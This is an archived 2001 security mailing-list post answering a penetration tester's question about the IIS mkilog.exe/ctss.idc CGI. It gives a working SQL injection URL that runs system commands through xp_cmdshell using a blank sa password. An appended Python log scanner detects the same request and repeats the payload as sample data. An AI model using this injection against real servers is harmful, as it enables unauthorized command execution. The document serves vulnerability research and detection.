Re: Information about /scripts/toos/mkilog.exe

From: H D Moore (hdmat_private)
Date: Tue Jul 31 2001 - 10:50:23 PDT


    mkilog.exe simply posts data to ctss.idc, which creates a table based on the 
    parameters it gets:
    
    [ctss.idc]
    Datasource: %ds%
    Username: %user%
    Password: %pwd%
    Template: ct.htx
    SQLStatement:
    +create table %table% (
    +ClientHost varchar(50), username varchar(50),
    +LogTime datetime, service varchar( 20), machine varchar( 20),
    +serverip varchar( 50), processingtime int, bytesrecvd int,
    +bytessent int, servicestatus int, win32status int,
    +operation varchar( 200), target varchar(200), parameters text )
    
    If you pass a correct DataSource, User, and Password (LocalServer, sa, blank 
    password for locally installed servers), then change the table to:
    
    bogustable(bleh int); EXEC master..xp_cmdshell("cmd.exe /c echo 0wned");--
    
    You can use it to run system commands.  In this case, the actual query you 
    would send is (lines probably wrapped):
    
    /scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=bogustable(bleh 
    int);EXEC+master..xp_cmdshell("cmd.exe+/c echo+0wned");--
    
    For every query you run you have to create another garbage table, so remember 
    to clean up all those bogus tables when you are done.
    
    For some reason SQL Server 6.5 limits your command parameter to 30 characters 
    when executed this way (which is _really_ annoying), I haven't been able to 
    track down why yet.  Good luck!
    
    -HD
    
    http://www.digitaloffense.net (play)
    http://www.digitaldefense.net (work)
    
    
    On Tuesday 31 July 2001 06:48 am, César González wrote:
    > Hello all,
    >
    > I am doing a penetration test, and some vulnerability scanners alert
    > about the script mkilog.exe. More exactly, Nessus said the following:
    >
    >     The CGI /scripts/tools/mkilog.exe is present.
    >
    >     This CGI allows an attacker to view and modify SQL database
    >     contents.
    >
    > No SecurityFocus links, CVE advisory, etc. I have searched the most popular
    > security search engines but nothing appears. Any help will be appreciated.
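
A defender's view of the request described in this message, as an added example that is not part of the original post: a Python scan of W3C-format IIS log lines for requests to ctss.idc whose `table` parameter is anything other than a plain identifier, or that log in as `sa` with a blank password. The log lines, the field layout and the `weblog` account are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log (not from the original post); addresses are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-07-31 17:02:11 192.0.2.10 GET /scripts/tools/ctss.idc ds=LocalServer&user=weblog&pwd=s3cret&table=iislog 200
2001-07-31 17:03:40 192.0.2.77 GET /scripts/tools/ctss.idc ds=LocalServer&user=sa&pwd=&table=bogustable(bleh+int);EXEC+master..xp_cmdshell("cmd.exe+/c+echo+0wned");-- 200
2001-07-31 17:04:02 192.0.2.10 GET /default.htm - 200
"""

TARGETS = {"/scripts/tools/ctss.idc", "/scripts/tools/mkilog.exe"}
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")  # what a real table name looks like

def parse_query(query):
    """Split a raw query string on '&' only, so ';' stays inside the value."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[key.lower()] = unquote_plus(value)
    return params

def scan(log_text):
    """Return [(client_ip, [reasons])] for suspicious requests to the sample scripts."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names follow the directive
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if row.get("cs-uri-stem", "").lower() not in TARGETS:
            continue
        params = parse_query(row.get("cs-uri-query", ""))
        table, reasons = params.get("table", ""), []
        if table and not IDENT.fullmatch(table):
            reasons.append("table is not a plain identifier")
        if "xp_cmdshell" in table.lower():
            reasons.append("xp_cmdshell in table parameter")
        if params.get("user", "").lower() == "sa" and params.get("pwd", "") == "":
            reasons.append("sa login with blank password")
        if reasons:
            hits.append((row.get("c-ip", "?"), reasons))
    return hits

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, "; ".join(reasons))
```

W3C logs record the query string but not POST bodies, so data posted through mkilog.exe itself will not appear in `cs-uri-query`; any logged hit on either path is still worth reviewing.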
    
    



    This archive was generated by hypermail 2b30 : Tue Jul 31 2001 - 15:19:31 PDT